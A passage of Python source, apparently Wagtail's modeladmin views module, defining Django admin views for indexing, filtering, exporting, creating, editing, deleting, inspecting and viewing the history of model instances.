RevisionMixin, TranslatableMixin\n\nfrom .forms import ParentChooserForm\n\ntry:\n from django.contrib.admin.utils import lookup_spawns_duplicates\nexcept ImportError:\n # fallback for Django <4.0\n from django.contrib.admin.utils import (\n lookup_needs_distinct as lookup_spawns_duplicates,\n )\n\n\nQUERY_TERMS = {\n \"contains\",\n \"day\",\n \"endswith\",\n \"exact\",\n \"gt\",\n \"gte\",\n \"hour\",\n \"icontains\",\n \"iendswith\",\n \"iexact\",\n \"in\",\n \"iregex\",\n \"isnull\",\n \"istartswith\",\n \"lt\",\n \"lte\",\n \"minute\",\n \"month\",\n \"range\",\n \"regex\",\n \"search\",\n \"second\",\n \"startswith\",\n \"week_day\",\n \"year\",\n}\n\n\nclass WMABaseView(TemplateView):\n \"\"\"\n Groups together common functionality for all app views.\n \"\"\"\n\n model_admin = None\n meta_title = \"\"\n page_title = \"\"\n page_subtitle = \"\"\n\n def __init__(self, model_admin):\n self.model_admin = model_admin\n self.model = model_admin.model\n self.opts = self.model._meta\n self.app_label = force_str(self.opts.app_label)\n self.model_name = force_str(self.opts.model_name)\n self.verbose_name = force_str(self.opts.verbose_name)\n self.verbose_name_plural = force_str(self.opts.verbose_name_plural)\n self.pk_attname = self.opts.pk.attname\n self.is_pagemodel = model_admin.is_pagemodel\n self.permission_helper = model_admin.permission_helper\n self.url_helper = model_admin.url_helper\n\n def 
check_action_permitted(self, user):\n return True\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if not self.check_action_permitted(request.user):\n raise PermissionDenied\n button_helper_class = self.model_admin.get_button_helper_class()\n self.button_helper = button_helper_class(self, request)\n return super().dispatch(request, *args, **kwargs)\n\n @cached_property\n def menu_icon(self):\n return self.model_admin.get_menu_icon()\n\n @cached_property\n def header_icon(self):\n return self.menu_icon\n\n def get_page_title(self):\n return self.page_title or capfirst(self.opts.verbose_name_plural)\n\n def get_meta_title(self):\n return self.meta_title or self.get_page_title()\n\n @cached_property\n def index_url(self):\n return self.url_helper.index_url\n\n @cached_property\n def create_url(self):\n return self.url_helper.create_url\n\n def get_base_queryset(self, request=None):\n return self.model_admin.get_queryset(request or self.request)\n\n def get_context_data(self, **kwargs):\n context = {\n \"view\": self,\n \"model_admin\": self.model_admin,\n }\n context.update(kwargs)\n return super().get_context_data(**context)\n\n\nclass ModelFormView(WMABaseView, FormView):\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.edit_handler = self.get_edit_handler()\n\n def get_form(self):\n form = super().get_form()\n return form\n\n def get_edit_handler(self):\n edit_handler = self.model_admin.get_edit_handler()\n return edit_handler.bind_to_model(self.model_admin.model)\n\n def get_form_class(self):\n return self.edit_handler.get_form_class()\n\n def get_success_url(self):\n return self.index_url\n\n def get_instance(self):\n return getattr(self, \"instance\", None) or self.model()\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs.update({\"instance\": self.get_instance(), \"for_user\": self.request.user})\n return kwargs\n\n @property\n def media(self):\n return forms.Media(\n css={\"all\": self.model_admin.get_form_view_extra_css()},\n js=self.model_admin.get_form_view_extra_js(),\n )\n\n def get_context_data(self, form=None, **kwargs):\n if form is None:\n form = self.get_form()\n\n bound_panel = self.edit_handler.get_bound_panel(\n form=form, instance=form.instance, request=self.request\n )\n\n prepopulated_fields = self.get_prepopulated_fields(form)\n context = {\n \"is_multipart\": form.is_multipart(),\n \"edit_handler\": bound_panel,\n \"form\": form,\n \"prepopulated_fields\": prepopulated_fields,\n \"media\": self.media + bound_panel.media + form.media,\n }\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def get_prepopulated_fields(self, form):\n fields = []\n for field_name, dependencies in self.model_admin.get_prepopulated_fields(\n self.request\n ).items():\n missing_dependencies = [\n f\"'{f}'\" for f in dependencies if f not in form.fields\n ]\n if len(missing_dependencies) != 0:\n missing_deps_string = \", \".join(missing_dependencies)\n dependency_string = (\n \"dependencies\" if len(missing_dependencies) > 1 else \"dependency\"\n )\n warnings.warn(\n f\"Missing {dependency_string} {missing_deps_string} for prepopulated_field '{field_name}''.\",\n category=RuntimeWarning,\n )\n elif field_name in form.fields:\n fields.append(\n {\n \"field\": form[field_name],\n \"dependencies\": [form[f] for f in dependencies],\n }\n )\n return fields\n\n def get_success_message(self, instance):\n return _(\"%(model_name)s '%(object)s' created.\") % {\n 
\"model_name\": capfirst(self.opts.verbose_name),\n \"object\": instance,\n }\n\n def get_success_message_buttons(self, instance):\n button_url = self.url_helper.get_action_url(\"edit\", quote(instance.pk))\n return [messages.button(button_url, _(\"Edit\"))]\n\n def get_error_message(self):\n model_name = self.verbose_name\n return _(\"The %(object)s could not be created due to errors.\") % {\n \"object\": model_name\n }\n\n def form_valid(self, form):\n self.instance = form.save()\n messages.success(\n self.request,\n self.get_success_message(self.instance),\n buttons=self.get_success_message_buttons(self.instance),\n )\n return redirect(self.get_success_url())\n\n def form_invalid(self, form):\n messages.validation_error(self.request, self.get_error_message(), form)\n return self.render_to_response(self.get_context_data(form=form))\n\n\nclass InstanceSpecificView(WMABaseView):\n\n instance_pk = None\n pk_quoted = None\n instance = None\n locale = None\n\n def __init__(self, model_admin, instance_pk):\n super().__init__(model_admin)\n self.instance_pk = unquote(instance_pk)\n self.pk_quoted = quote(self.instance_pk)\n filter_kwargs = {self.pk_attname: self.instance_pk}\n object_qs = model_admin.model._default_manager.get_queryset().filter(\n **filter_kwargs\n )\n self.instance = get_object_or_404(object_qs)\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n model_admin.model, TranslatableMixin\n ):\n self.locale = self.instance.locale\n\n def get_page_subtitle(self):\n return self.instance\n\n @cached_property\n def edit_url(self):\n return self.url_helper.get_action_url(\"edit\", self.pk_quoted)\n\n @cached_property\n def delete_url(self):\n return self.url_helper.get_action_url(\"delete\", self.pk_quoted)\n\n def get_context_data(self, **kwargs):\n context = {\"instance\": self.instance}\n context.update(kwargs)\n return super().get_context_data(**context)\n\n\nclass IndexView(SpreadsheetExportMixin, WMABaseView):\n\n ORDER_VAR = \"o\"\n ORDER_TYPE_VAR = \"ot\"\n PAGE_VAR = \"p\"\n SEARCH_VAR = \"q\"\n ERROR_FLAG = \"e\"\n EXPORT_VAR = \"export\"\n IGNORED_PARAMS = (ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, EXPORT_VAR)\n\n # sortable_by is required by the django.contrib.admin.templatetags.admin_list.result_headers\n # template tag - see https://docs.djangoproject.com/en/stable/ref/contrib/admin/#django.contrib.admin.ModelAdmin.sortable_by\n sortable_by = None\n\n # add_facets is required by the django.contrib.admin.filters.ListFilter.choices method\n # as of Django 5.0 - see https://github.com/django/django/pull/16495\n add_facets = False\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n # Only continue if logged in user has list permission\n if not self.permission_helper.user_can_list(request.user):\n raise PermissionDenied\n\n self.list_export = self.model_admin.get_list_export(request)\n self.list_display = self.model_admin.get_list_display(request)\n self.list_filter = self.model_admin.get_list_filter(request)\n self.search_fields = self.model_admin.get_search_fields(request)\n self.items_per_page = self.model_admin.list_per_page\n self.select_related = self.model_admin.list_select_related\n self.search_handler = self.model_admin.get_search_handler(\n request, self.search_fields\n )\n self.export = request.GET.get(self.EXPORT_VAR)\n\n # Get search parameters from the query string.\n try:\n self.page_num = int(request.GET.get(self.PAGE_VAR, 0))\n except ValueError:\n self.page_num = 0\n\n if DJANGO_VERSION >= (5, 0):\n 
self.params = request.GET.copy()\n else:\n self.params = request.GET.dict()\n\n if self.PAGE_VAR in self.params:\n del self.params[self.PAGE_VAR]\n if self.ERROR_FLAG in self.params:\n del self.params[self.ERROR_FLAG]\n if self.EXPORT_VAR in self.params:\n del self.params[self.EXPORT_VAR]\n\n self.query = request.GET.get(self.SEARCH_VAR, \"\")\n\n self.queryset = self.get_queryset(request)\n\n if self.export in self.FORMATS:\n return self.as_spreadsheet(self.queryset, self.export)\n\n return super().dispatch(request, *args, **kwargs)\n\n def get_filename(self):\n \"\"\"Get filename for exported spreadsheet, without extension\"\"\"\n return getattr(self.model_admin, \"export_filename\", super().get_filename())\n\n def get_heading(self, queryset, field):\n \"\"\"Get headings for exported spreadsheet column for the relevant field\"\"\"\n heading_override = self.export_headings.get(field)\n if heading_override:\n return force_str(heading_override)\n return force_str(\n label_for_field(\n field, model=self.model, model_admin=self.model_admin\n ).title()\n )\n\n def to_row_dict(self, item):\n \"\"\"Returns an OrderedDict (in the order given by list_export) of the exportable information for a model instance\"\"\"\n row_dict = OrderedDict()\n for field in self.list_export:\n f, attr, value = lookup_field(field, item, self.model_admin)\n if not value:\n value = getattr(\n attr,\n \"empty_value_display\",\n self.model_admin.get_empty_value_display(field),\n )\n row_dict[field] = value\n\n return row_dict\n\n @property\n def media(self):\n return forms.Media(\n css={\"all\": self.model_admin.get_index_view_extra_css()},\n js=self.model_admin.get_index_view_extra_js(),\n )\n\n def get_buttons_for_obj(self, obj):\n return self.button_helper.get_buttons_for_obj(\n obj, classnames_add=[\"button-small\"]\n )\n\n def get_search_results(self, request, queryset, search_term):\n kwargs = self.model_admin.get_extra_search_kwargs(request, search_term)\n kwargs[\"preserve_order\"] = self.ORDER_VAR in request.GET\n return self.search_handler.search_queryset(queryset, search_term, **kwargs)\n\n def get_filters_params(self, params=None):\n \"\"\"\n Returns all params except IGNORED_PARAMS\n \"\"\"\n if not params:\n params = self.params\n lookup_params = params.copy() # a dictionary of the query string\n # Remove all the parameters that are globally and systematically\n # ignored.\n for ignored in self.IGNORED_PARAMS:\n if ignored in lookup_params:\n del lookup_params[ignored]\n return lookup_params\n\n def get_filters(self, request):\n lookup_params = self.get_filters_params()\n use_distinct = False\n\n filter_specs = []\n if self.list_filter:\n for list_filter in self.list_filter:\n if callable(list_filter):\n # This is simply a custom list filter class.\n spec = list_filter(\n request, lookup_params, self.model, self.model_admin\n )\n else:\n field_path = None\n if isinstance(list_filter, (tuple, list)):\n # This is a custom FieldListFilter class for a given\n # field.\n field, field_list_filter_class = list_filter\n else:\n # This is simply a field name, so use the default\n # FieldListFilter class that has been registered for\n # the type of the given field.\n field = list_filter\n field_list_filter_class = FieldListFilter.create\n if not isinstance(field, models.Field):\n field_path = field\n field = get_fields_from_path(self.model, field_path)[-1]\n spec = field_list_filter_class(\n field,\n request,\n lookup_params,\n self.model,\n self.model_admin,\n field_path=field_path,\n )\n\n # Check if we need to use 
distinct()\n use_distinct = use_distinct or lookup_spawns_duplicates(\n self.opts, field_path\n )\n if spec and spec.has_output():\n filter_specs.append(spec)\n\n # At this point, all the parameters used by the various ListFilters\n # have been removed from lookup_params, which now only contains other\n # parameters passed via the query string. We now loop through the\n # remaining parameters both to ensure that all the parameters are valid\n # fields and to determine if at least one of them needs distinct(). If\n # the lookup parameters aren't real fields, then bail out.\n try:\n for key, value in lookup_params.items():\n lookup_params[key] = prepare_lookup_value(key, value)\n use_distinct = use_distinct or lookup_spawns_duplicates(self.opts, key)\n return (filter_specs, bool(filter_specs), lookup_params, use_distinct)\n except FieldDoesNotExist as e:\n raise IncorrectLookupParameters from e\n\n def get_query_string(self, new_params=None, remove=None):\n if new_params is None:\n new_params = {}\n if remove is None:\n remove = []\n p = self.params.copy()\n for r in remove:\n for k in list(p):\n if k.startswith(r):\n del p[k]\n for k, v in new_params.items():\n if v is None:\n if k in p:\n del p[k]\n else:\n p[k] = v\n return \"?%s\" % urlencode(sorted(p.items()))\n\n def _get_default_ordering(self):\n ordering = []\n if self.model_admin.ordering:\n ordering = self.model_admin.ordering\n elif self.opts.ordering:\n ordering = self.opts.ordering\n return ordering\n\n def get_default_ordering(self, request):\n if self.model_admin.get_ordering(request):\n return self.model_admin.get_ordering(request)\n if self.opts.ordering:\n return self.opts.ordering\n return ()\n\n def get_ordering_field(self, field_name):\n \"\"\"\n Returns the proper model field name corresponding to the given\n field_name to use for ordering. field_name may either be the name of a\n proper model field or the name of a method (on the admin or model) or a\n callable with the 'admin_order_field' attribute. Returns None if no\n proper model field name can be matched.\n \"\"\"\n try:\n field = self.opts.get_field(field_name)\n return field.name\n except FieldDoesNotExist:\n # See whether field_name is a name of a non-field\n # that allows sorting.\n if callable(field_name):\n attr = field_name\n elif hasattr(self.model_admin, field_name):\n attr = getattr(self.model_admin, field_name)\n else:\n attr = getattr(self.model, field_name)\n return getattr(attr, \"admin_order_field\", None)\n\n def get_ordering(self, request, queryset):\n \"\"\"\n Returns the list of ordering fields for the change list.\n First we check the get_ordering() method in model admin, then we check\n the object's default ordering. Then, any manually-specified ordering\n from the query string overrides anything. 
Finally, a deterministic\n        order is guaranteed by ensuring the primary key is used as the last\n        ordering field.\n        \"\"\"\n        params = self.params\n        ordering = list(self.get_default_ordering(request))\n        if self.ORDER_VAR in params:\n            # Clear ordering and used params\n            ordering = []\n            order_params = params[self.ORDER_VAR].split(\".\")\n            for p in order_params:\n                try:\n                    none, pfx, idx = p.rpartition(\"-\")\n                    field_name = self.list_display[int(idx)]\n                    order_field = self.get_ordering_field(field_name)\n                    if not order_field:\n                        continue  # No 'admin_order_field', skip it\n                    # reverse order if order_field has already \"-\" as prefix\n                    if order_field.startswith(\"-\") and pfx == \"-\":\n                        ordering.append(order_field[1:])\n                    else:\n                        ordering.append(pfx + order_field)\n                except (IndexError, ValueError):\n                    continue  # Invalid ordering specified, skip it.\n\n        # Add the given query's ordering fields, if any.\n        ordering.extend(queryset.query.order_by)\n\n        # Ensure that the primary key is systematically present in the list of\n        # ordering fields so we can guarantee a deterministic order across all\n        # database backends.\n        pk_name = self.opts.pk.name\n\n        if not (set(ordering) & {\"pk\", \"-pk\", pk_name, \"-\" + pk_name}):\n            # ordering isn't already being applied to pk\n            ordering.append(\"-\" + pk_name)\n\n        return ordering\n\n    def get_ordering_field_columns(self):\n        \"\"\"\n        Returns an OrderedDict of ordering field column numbers and asc/desc\n        \"\"\"\n\n        # We must cope with more than one column having the same underlying\n        # sort field, so we base things on column numbers.\n        ordering = self._get_default_ordering()\n        ordering_fields = OrderedDict()\n        if self.ORDER_VAR not in self.params:\n            # for ordering specified on model_admin or model Meta, we don't\n            # know the right column numbers absolutely, because there might be\n            # more than one column associated with that ordering, so we guess.\n            for field in ordering:\n                if field.startswith(\"-\"):\n                    field = field[1:]\n                    order_type = \"desc\"\n                else:\n                    order_type = \"asc\"\n                for index, attr in enumerate(self.list_display):\n                    if self.get_ordering_field(attr) == field:\n                        ordering_fields[index] = order_type\n                        break\n        else:\n            for p in self.params[self.ORDER_VAR].split(\".\"):\n                none, pfx, idx = p.rpartition(\"-\")\n                try:\n                    idx = int(idx)\n                except ValueError:\n                    continue  # skip it\n                ordering_fields[idx] = \"desc\" if pfx == \"-\" else \"asc\"\n        return ordering_fields\n\n    def get_queryset(self, request=None):\n        request = request or self.request\n\n        # First, we collect all the declared list filters.\n        (\n            self.filter_specs,\n            self.has_filters,\n            remaining_lookup_params,\n            filters_use_distinct,\n        ) = self.get_filters(request)\n\n        # Then, we let every list filter modify the queryset to its liking.\n        qs = self.get_base_queryset(request)\n        for filter_spec in self.filter_specs:\n            new_qs = filter_spec.queryset(request, qs)\n            if new_qs is not None:\n                qs = new_qs\n\n        try:\n            # Finally, we apply the remaining lookup parameters from the query\n            # string (i.e. 
those that haven't already been processed by the\n # filters).\n if DJANGO_VERSION >= (5, 0):\n from django.contrib.admin.utils import (\n build_q_object_from_lookup_parameters,\n )\n\n qs = qs.filter(\n build_q_object_from_lookup_parameters(remaining_lookup_params)\n )\n else:\n qs = qs.filter(**remaining_lookup_params)\n except (SuspiciousOperation, ImproperlyConfigured):\n # Allow certain types of errors to be re-raised as-is so that the\n # caller can treat them in a special way.\n raise\n except Exception as e: # noqa: BLE001\n # Every other error is caught with a naked except, because we don't\n # have any other way of validating lookup parameters. They might be\n # invalid if the keyword arguments are incorrect, or if the values\n # are not in the correct type, so we might get FieldError,\n # ValueError, ValidationError, or ?.\n raise IncorrectLookupParameters(e)\n\n if not qs.query.select_related:\n qs = self.apply_select_related(qs)\n\n # Set ordering.\n ordering = self.get_ordering(request, qs)\n qs = qs.order_by(*ordering)\n\n # Remove duplicates from results, if necessary\n if filters_use_distinct:\n qs = qs.distinct()\n\n # Apply search results\n return self.get_search_results(request, qs, self.query)\n\n def apply_select_related(self, qs):\n if self.select_related is True:\n return qs.select_related()\n\n if self.select_related is False:\n if self.has_related_field_in_list_display():\n return qs.select_related()\n\n if self.select_related:\n return qs.select_related(*self.select_related)\n return qs\n\n def has_related_field_in_list_display(self):\n for field_name in self.list_display:\n try:\n field = self.opts.get_field(field_name)\n except FieldDoesNotExist:\n pass\n else:\n if isinstance(field, models.ManyToOneRel):\n return True\n return False\n\n def get_context_data(self, **kwargs):\n user = self.request.user\n all_count = self.get_base_queryset().count()\n queryset = self.get_queryset()\n result_count = queryset.count()\n paginator = Paginator(queryset, self.items_per_page)\n\n try:\n page_obj = paginator.page(self.page_num + 1)\n except InvalidPage:\n page_obj = paginator.page(1)\n\n context = {\n \"view\": self,\n \"all_count\": all_count,\n \"result_count\": result_count,\n \"paginator\": paginator,\n \"page_obj\": page_obj,\n \"object_list\": page_obj.object_list,\n \"user_can_create\": self.permission_helper.user_can_create(user),\n \"show_search\": self.search_handler.show_search_form,\n }\n\n if self.is_pagemodel:\n models = self.model.allowed_parent_page_models()\n allowed_parent_types = [m._meta.verbose_name for m in models]\n valid_parents = self.permission_helper.get_valid_parent_pages(user)\n valid_parent_count = valid_parents.count()\n context.update(\n {\n \"no_valid_parents\": not valid_parent_count,\n \"required_parent_types\": allowed_parent_types,\n }\n )\n\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def get_template_names(self):\n return self.model_admin.get_index_template()\n\n\nclass CreateView(ModelFormView):\n page_title = gettext_lazy(\"New\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_create(user)\n\n def dispatch(self, request, *args, **kwargs):\n if self.is_pagemodel:\n user = request.user\n parents = self.permission_helper.get_valid_parent_pages(user)\n parent_count = parents.count()\n\n # There's only one available parent for this page type for this\n # user, so we send them along with that as the chosen parent page\n if parent_count == 1:\n parent = parents.get()\n 
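# quote() makes the pk safe to embed in the action URL below (pks may contain slashes or other special characters).\n 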
parent_pk = quote(parent.pk)\n return redirect(\n self.url_helper.get_action_url(\n \"add\", self.app_label, self.model_name, parent_pk\n )\n )\n\n # The page can be added in multiple places, so redirect to the\n # choose_parent view so that the parent can be specified\n return redirect(self.url_helper.get_action_url(\"choose_parent\"))\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model, TranslatableMixin\n ):\n selected_locale = self.request.GET.get(\"locale\")\n if selected_locale:\n locale = get_object_or_404(Locale, language_code=selected_locale)\n else:\n locale = Locale.get_default()\n\n kwargs.update(\n {\n \"locale\": locale,\n \"translations\": [\n {\n \"locale\": locale,\n \"url\": self.create_url + \"?locale=\" + locale.language_code,\n }\n for locale in Locale.objects.all().exclude(id=locale.id)\n ],\n }\n )\n\n return super().dispatch(request, *args, **kwargs)\n\n def form_valid(self, form):\n response = super().form_valid(form)\n revision = None\n\n # Save revision if the model inherits from RevisionMixin\n if isinstance(self.instance, RevisionMixin):\n revision = self.instance.save_revision(user=self.request.user)\n\n log(\n instance=self.instance,\n action=\"wagtail.create\",\n revision=revision,\n content_changed=True,\n )\n return response\n\n def get_meta_title(self):\n return _(\"Create new %(object)s\") % {\"object\": self.verbose_name}\n\n def get_page_subtitle(self):\n return capfirst(self.verbose_name)\n\n def get_template_names(self):\n return self.model_admin.get_create_template()\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model, TranslatableMixin\n ):\n selected_locale = self.request.GET.get(\"locale\")\n if selected_locale:\n kwargs[\"instance\"].locale = get_object_or_404(\n Locale, language_code=selected_locale\n )\n\n return kwargs\n\n\nclass EditView(ModelFormView, InstanceSpecificView):\n page_title = gettext_lazy(\"Editing\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_edit_obj(user, self.instance)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if self.is_pagemodel:\n return redirect(self.url_helper.get_action_url(\"edit\", self.pk_quoted))\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model, TranslatableMixin\n ):\n translations = []\n for translation in self.instance.get_translations().select_related(\n \"locale\"\n ):\n locale = translation.locale\n url = (\n self.url_helper.get_action_url(\"edit\", translation.pk)\n + \"?locale=\"\n + locale.language_code\n )\n translations.append({\"locale\": locale, \"url\": url})\n\n if translations:\n kwargs.update(\n {\n \"locale\": self.locale,\n \"translations\": translations,\n }\n )\n\n return super().dispatch(request, *args, **kwargs)\n\n def get_meta_title(self):\n return _(\"Editing %(object)s\") % {\"object\": self.verbose_name}\n\n def get_success_message(self, instance):\n return _(\"%(model_name)s '%(object)s' updated.\") % {\n \"model_name\": capfirst(self.verbose_name),\n \"object\": instance,\n }\n\n def get_context_data(self, **kwargs):\n context = {\n \"user_can_delete\": self.permission_helper.user_can_delete_obj(\n self.request.user, self.instance\n )\n }\n context.update(kwargs)\n if self.model_admin.history_view_enabled:\n context[\"latest_log_entry\"] = log_registry.get_logs_for_instance(\n self.instance\n ).first()\n 
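# Build a link to the per-object history view; the pk is quoted to be URL-safe.\n 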
context[\"history_url\"] = self.url_helper.get_action_url(\n \"history\", quote(self.instance.pk)\n )\n else:\n context[\"latest_log_entry\"] = None\n context[\"history_url\"] = None\n\n return super().get_context_data(**context)\n\n def get_error_message(self):\n name = self.verbose_name\n return _(\"The %(object)s could not be saved due to errors.\") % {\"object\": name}\n\n def get_template_names(self):\n return self.model_admin.get_edit_template()\n\n def form_valid(self, form):\n response = super().form_valid(form)\n revision = None\n\n self.has_content_changes = form.has_changed()\n\n # Save revision if the model inherits from RevisionMixin\n if isinstance(self.instance, RevisionMixin):\n revision = self.instance.save_revision(\n user=self.request.user,\n changed=self.has_content_changes,\n )\n\n log(\n instance=self.instance,\n action=\"wagtail.edit\",\n revision=revision,\n content_changed=self.has_content_changes,\n )\n return response\n\n\nclass ChooseParentView(WMABaseView):\n def dispatch(self, request, *args, **kwargs):\n if not self.permission_helper.user_can_create(request.user):\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_page_title(self):\n return _(\"Add %(object)s\") % {\"object\": self.verbose_name}\n\n def get_form(self, request):\n parents = self.permission_helper.get_valid_parent_pages(request.user)\n return ParentChooserForm(parents, request.POST or None)\n\n def get(self, request, *args, **kwargs):\n form = self.get_form(request)\n context = self.get_context_data(form=form)\n return self.render_to_response(context)\n\n def post(self, request, *args, **kargs):\n form = self.get_form(request)\n if form.is_valid():\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def form_valid(self, form):\n parent_pk = quote(form.cleaned_data[\"parent_page\"].pk)\n return redirect(\n self.url_helper.get_action_url(\n \"add\", self.app_label, self.model_name, parent_pk\n )\n )\n\n def form_invalid(self, form):\n context = self.get_context_data(form=form)\n return self.render_to_response(context)\n\n def get_template_names(self):\n return self.model_admin.get_choose_parent_template()\n\n\nclass DeleteView(InstanceSpecificView):\n page_title = gettext_lazy(\"Delete\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_delete_obj(user, self.instance)\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if not self.check_action_permitted(request.user):\n raise PermissionDenied\n if self.is_pagemodel:\n return redirect(self.url_helper.get_action_url(\"delete\", self.pk_quoted))\n return super().dispatch(request, *args, **kwargs)\n\n def get_meta_title(self):\n return _(\"Confirm deletion of %(object)s\") % {\"object\": self.verbose_name}\n\n def confirmation_message(self):\n return _(\n \"Are you sure you want to delete this %(object)s? 
If other things in your \"\n \"site are related to it, they may also be affected.\"\n ) % {\"object\": self.verbose_name}\n\n def delete_instance(self):\n self.instance.delete()\n\n def post(self, request, *args, **kwargs):\n try:\n msg = _(\"%(model_name)s '%(object)s' deleted.\") % {\n \"model_name\": self.verbose_name,\n \"object\": self.instance,\n }\n with transaction.atomic():\n log(instance=self.instance, action=\"wagtail.delete\")\n self.delete_instance()\n messages.success(request, msg)\n return redirect(self.index_url)\n except models.ProtectedError:\n linked_objects = []\n fields = self.model._meta.fields_map.values()\n fields = (\n obj for obj in fields if not isinstance(obj.field, ManyToManyField)\n )\n for rel in fields:\n if rel.on_delete == models.PROTECT:\n if isinstance(rel, OneToOneRel):\n try:\n obj = getattr(self.instance, rel.get_accessor_name())\n except ObjectDoesNotExist:\n pass\n else:\n linked_objects.append(obj)\n else:\n qs = getattr(self.instance, rel.get_accessor_name())\n for obj in qs.all():\n linked_objects.append(obj)\n context = self.get_context_data(\n protected_error=True, linked_objects=linked_objects\n )\n return self.render_to_response(context)\n\n def get_template_names(self):\n return self.model_admin.get_delete_template()\n\n\nclass InspectView(InstanceSpecificView):\n\n page_title = gettext_lazy(\"Inspecting\")\n\n def check_action_permitted(self, user):\n return self.permission_helper.user_can_inspect_obj(user, self.instance)\n\n def dispatch(self, request, *args, **kwargs):\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n self.model_admin.model, TranslatableMixin\n ):\n translations = []\n for translation in self.instance.get_translations().select_related(\n \"locale\"\n ):\n locale = translation.locale\n url = (\n self.url_helper.get_action_url(\"inspect\", translation.pk)\n + \"?locale=\"\n + locale.language_code\n )\n translations.append({\"locale\": locale, \"url\": url})\n\n if translations:\n kwargs.update(\n {\n \"locale\": self.locale,\n \"translations\": translations,\n }\n )\n\n return super().dispatch(request, *args, **kwargs)\n\n @property\n def media(self):\n return forms.Media(\n css={\"all\": self.model_admin.get_inspect_view_extra_css()},\n js=self.model_admin.get_inspect_view_extra_js(),\n )\n\n def get_meta_title(self):\n return _(\"Inspecting %(object)s\") % {\"object\": self.verbose_name}\n\n def get_field_label(self, field_name, field=None):\n \"\"\"Return a label to display for a field\"\"\"\n return label_for_field(field_name, model=self.model)\n\n def get_field_display_value(self, field_name, field=None):\n \"\"\"Return a display value for a field/attribute\"\"\"\n\n # First we check for a 'get_fieldname_display' property/method on\n # the model, and return the value of that, if present.\n val_funct = getattr(self.instance, \"get_%s_display\" % field_name, None)\n if val_funct is not None:\n if callable(val_funct):\n return val_funct()\n return val_funct\n\n # Now let's get the attribute value from the instance itself and see if\n # we can render something useful. 
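If the attribute is missing, getattr 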
raises AttributeError appropriately.\n val = getattr(self.instance, field_name)\n\n if isinstance(val, models.Manager):\n val = val.all()\n\n if isinstance(val, models.QuerySet):\n if val.exists():\n return \", \".join([\"%s\" % obj for obj in val])\n return self.model_admin.get_empty_value_display(field_name)\n\n # wagtail.images might not be installed\n try:\n from wagtail.images.models import AbstractImage\n\n if isinstance(val, AbstractImage):\n # Render a rendition of the image\n return self.get_image_field_display(field_name, field)\n except RuntimeError:\n pass\n\n # wagtail.wagtaildocuments might not be installed\n try:\n from wagtail.documents.models import AbstractDocument\n\n if isinstance(val, AbstractDocument):\n # Render a link to the document\n return self.get_document_field_display(field_name, field)\n except RuntimeError:\n pass\n\n # Resort to returning the real value or 'empty value'\n if val or val is False:\n return val\n return self.model_admin.get_empty_value_display(field_name)\n\n def get_image_field_display(self, field_name, field):\n \"\"\"Render an image\"\"\"\n from wagtail.images.shortcuts import get_rendition_or_not_found\n\n image = getattr(self.instance, field_name)\n if image:\n return get_rendition_or_not_found(image, \"max-400x400\").img_tag\n return self.model_admin.get_empty_value_display(field_name)\n\n def get_document_field_display(self, field_name, field):\n \"\"\"Render a link to a document\"\"\"\n document = getattr(self.instance, field_name)\n if document:\n return format_html(\n '<a href=\"{}\">{} <span class=\"meta\">({}, {})</span></a>',\n document.url,\n document.title,\n document.file_extension.upper(),\n filesizeformat(document.file.size),\n )\n return self.model_admin.get_empty_value_display(field_name)\n\n def get_dict_for_field(self, field_name):\n \"\"\"\n Return a dictionary containing `label` and `value` values to display\n for a field.\n \"\"\"\n try:\n field = self.model._meta.get_field(field_name)\n except FieldDoesNotExist:\n field = None\n return {\n \"label\": self.get_field_label(field_name, field),\n \"value\": self.get_field_display_value(field_name, field),\n }\n\n def get_fields_dict(self):\n \"\"\"\n Return a list of `label`/`value` dictionaries to represent the\n fields named by the model_admin class's `get_inspect_view_fields` method\n \"\"\"\n fields = []\n for field_name in self.model_admin.get_inspect_view_fields():\n fields.append(self.get_dict_for_field(field_name))\n return fields\n\n def get_context_data(self, **kwargs):\n context = {\n \"fields\": self.get_fields_dict(),\n \"buttons\": self.button_helper.get_buttons_for_obj(\n self.instance, exclude=[\"inspect\"]\n ),\n }\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def get_template_names(self):\n return self.model_admin.get_inspect_template()\n\n\nclass HistoryView(MultipleObjectMixin, WagtailAdminTemplateMixin, InstanceSpecificView):\n page_title = gettext_lazy(\"History\")\n paginate_by = 50\n columns = [\n Column(\"message\", label=gettext_lazy(\"Action\")),\n UserColumn(\"user\", blank_display_name=\"system\"),\n DateColumn(\"timestamp\", label=gettext_lazy(\"Date\")),\n ]\n\n def get_page_subtitle(self):\n return str(self.instance)\n\n def get_template_names(self):\n return self.model_admin.get_history_template()\n\n def get_queryset(self):\n return log_registry.get_logs_for_instance(self.instance).prefetch_related(\n \"user__wagtail_userprofile\"\n )\n\n def get_context_data(self, **kwargs):\n self.object_list = 
